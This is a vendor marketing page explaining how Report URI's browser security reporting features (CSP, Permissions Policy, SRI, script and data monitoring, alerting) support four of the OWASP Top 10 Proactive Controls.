The OWASP Top 10 Proactive Controls are a set of security techniques that every software developer should know and apply in every project. Unlike a list of things to avoid, the Proactive Controls are positive, actionable guidance — security measures to build in from the start rather than bolt on afterwards.
The current release covers ten controls spanning input validation, cryptography, access control, identity management, component security, and leveraging the security features built into the browser itself. A new version is actively in development — and the ten controls, their numbering, and their scope remain consistent across both the current release and the upcoming one, meaning alignment with the Proactive Controls today carries directly forward.
Any organisation building or operating a web application should consider how these controls apply to their environment. The Proactive Controls are designed to be approachable — they are intended as foundational guidance for developers at all levels, not just security specialists.
Applying them consistently across your applications reduces your exposure to the most common and costly web attacks.
Report URI directly supports four of the OWASP Top 10 Proactive Controls that relate to browser security, real-time monitoring, and component integrity — in both the current release and the version currently in development:
C8 · Leverage Browser Security Features
Content Security Policy is the cornerstone of browser-side security. A well-deployed CSP tells the browser exactly which scripts, styles, images, and other resources are permitted to load — blocking everything else before it can execute.
Getting a CSP right is the hard part. Our CSP Wizard collects a complete inventory of every resource used across your entire site in seven days or less. The CSP Builder lets you construct and refine your policy in a visual editor before deployment. And once live, CSP Reporting captures every violation in real time so you can iterate safely without breaking your site.
C8 · Leverage Browser Security Features
Beyond CSP, modern browsers provide a suite of additional security mechanisms that reduce your attack surface and improve your visibility over network behaviour. Report URI surfaces violation reports from all of them.
Permissions Policy lets you declare that your site will never use camera, microphone, geolocation, or other powerful browser features — meaning even a successful code injection cannot abuse them. Cross-Origin Embedder Policy and Cross-Origin Opener Policy isolate your browsing context from untrusted cross-origin content, protecting against Spectre-style side-channel attacks. Network Error Logging captures DNS failures, connection errors, and unexpected server responses directly from the browser — with no JavaScript required.
Every violation from each of these headers is reported to Report URI, giving you a complete picture of browser-level security events across your real user population.
C8 · Leverage Browser Security Features
Subresource Integrity (SRI) lets you cryptographically verify that a resource hasn't been tampered with before the browser executes it. But SRI is opt-in — easy to miss, and invisible when skipped.
The CSP report-sha256 keyword goes further: for every script that loads on your page, the browser sends its cryptographic hash to Report URI, giving you an immutable audit trail of exactly what code ran. The newer Integrity-Policy header makes SRI mandatory — any script loaded without an integrity attribute is blocked outright and the violation is reported, turning a silent gap in your defences into a visible, actionable event.
C9 · Implement Security Logging and Monitoring
Report URI is a dedicated security logging and monitoring service for the browser layer. Every violation generated by your security headers — CSP, Permissions Policy, COEP, COOP, NEL, Integrity-Policy — is captured the moment it occurs, timestamped, and enriched with the blocked resource URL, document URL, and originating IP.
The OWASP Proactive Controls call for logging that captures malicious activity and feeds detection systems. Our real-time dashboard and powerful filtering tools let you cut through the noise to identify genuine attack patterns, distinguish attacker-injected content from legitimate configuration drift, and build a clear forensic record of security events across your real user population.
The browser reports it. We log it. You see it.
C9 · Implement Security Logging and Monitoring
Effective security monitoring is only as good as its ability to get the right information to the right people quickly. The OWASP Proactive Controls recognise that detection without notification is not enough.
Report URI sends configurable alerts via email, Slack, and webhooks the moment new violation types are detected. Whether an attacker is testing a new injection vector, a third-party script changes unexpectedly, or a new CSP violation pattern emerges, your team is notified in real time — giving you the window to respond before an incident escalates.
C6 · Keep your Components Secure
Third-party JavaScript is one of the highest-risk components in modern web applications. A compromised CDN, a tampered library, or a malicious dependency can expose your users' data without any visible sign on the page itself.
Script Watch monitors every JavaScript dependency loading across your site and alerts you the moment anything changes — a new script, a modified URL, or an unexpected addition. Because it runs in the browser via CSP, it sees your site exactly as your users do, including authenticated pages, geo-targeted content, and anything a perimeter scanner would miss.
Data Watch monitors every destination your pages are sending data to. If a new exfiltration endpoint appears — the hallmark of a Magecart attack — you'll know about it immediately.
C6 · Keep your Components Secure
Knowing a script is loading is only the first step — you also need to know whether it contains known vulnerabilities. Our JavaScript Integrity Monitoring identifies every script running across your site by its cryptographic fingerprint and cross-references it against our database of almost 13,000,000 verified fingerprints.
When a loaded script is identified as a library with a known CVE, Report URI surfaces that information directly — so you can see at a glance which of your users are being served vulnerable JavaScript, from which origin, and how widespread the exposure is. Combined with Threat Intelligence enrichment, this gives you a continuous, real-user view of your JavaScript component risk — far beyond what a point-in-time dependency scanner can provide.
C3 · Validate all Input & Handle Exceptions
Input validation is essential — but it is not infallible. C3 of the OWASP Proactive Controls recommends building security in layers, so that a bypass or gap in validation does not automatically result in a successful attack.
Content Security Policy is the most effective browser-side second line of defence against Cross-Site Scripting. A strict script-src policy blocks injected inline scripts and event handlers from executing even when malicious content reaches the page — meaning a validation failure becomes a logged CSP violation rather than a successful attack. The violation report tells you what was blocked, where it was injected, and when it happened, so you can find and fix the underlying input handling bug.
CSP does not replace input validation — it ensures that when validation fails, the attacker still loses.